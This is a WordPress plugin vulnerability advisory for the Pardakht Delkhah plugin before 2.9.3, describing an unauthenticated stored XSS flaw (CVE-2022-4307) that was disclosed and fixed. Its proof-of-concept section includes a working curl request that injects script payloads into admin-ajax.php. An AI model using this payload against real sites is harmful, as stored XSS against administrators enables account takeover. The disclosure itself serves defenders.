WordPress Plugin Vulnerabilities

Pardakht Delkhah < 2.9.3 - Unauthenticated Stored XSS

Description

The plugin does not sanitise and escape some parameters, allowing unauthenticated attackers to send a request with XSS payloads, which will be triggered when a high privilege users such as admin visits a page from the plugin.

Proof of Concept

1. Install and activate WoocCommerce (dependency, no configuration required)

2. Install the vulnerable plugin (pardakht-delkhah 2.9.2)

3. Under plugin's menu, "Custom payment" > "Gateway Settings", hit the save button to set the default gateway.

4. Invoke the following curl request to store two XSS payloads (both of which will trigger an alert box:

curl http://localhost:10008/wp-admin/admin-ajax.php \
    --data 'action=cupri_action&cupri_fmobile=981111111111&cupri_fprice="><script>alert(`xss1`)</script>&cupri_f0="><script>alert(`xss2`)</script>'

5. The XSS will be triggered when an admin navigates to the plugin's menu (/wp-admin/edit.php?post_type=cupri_pay)

Affects Plugins

Plugin icon
pardakht-delkhah
Fixed in 2.9.3

References

CVE
CVE-2022-4307

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
8.8 (high)

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified
Yes
WPVDB ID
4000ba69-d73f-4c5b-a299-82898304cebb

Timeline

Publicly Published
2022-12-27 (about 1 years ago)
Added
2022-12-27 (about 1 years ago)
Last Updated
2022-12-27 (about 1 years ago)

Other

Published
Title
Published
2023-10-02
Title
Email posts to subscribers <= 6.2 - Admin+ Stored XSS
Published
2021-08-16
Title
Language Bar Flags <= 1.0.8 - CSRF to Stored XSS
Published
2021-11-29
Title
WP RSS Aggregator < 4.19.3 - Subscriber+ Stored Cross-Site Scripting
Published
2023-11-21
Title
Perfmatters < 2.2.0 - Authenticated (Subscriber+) Stored Cross-Site Scripting
Published
2016-07-19
Title
Woo Email Control <= 1.01 - Reflected Cross-Site Scripting (XSS) & CSRF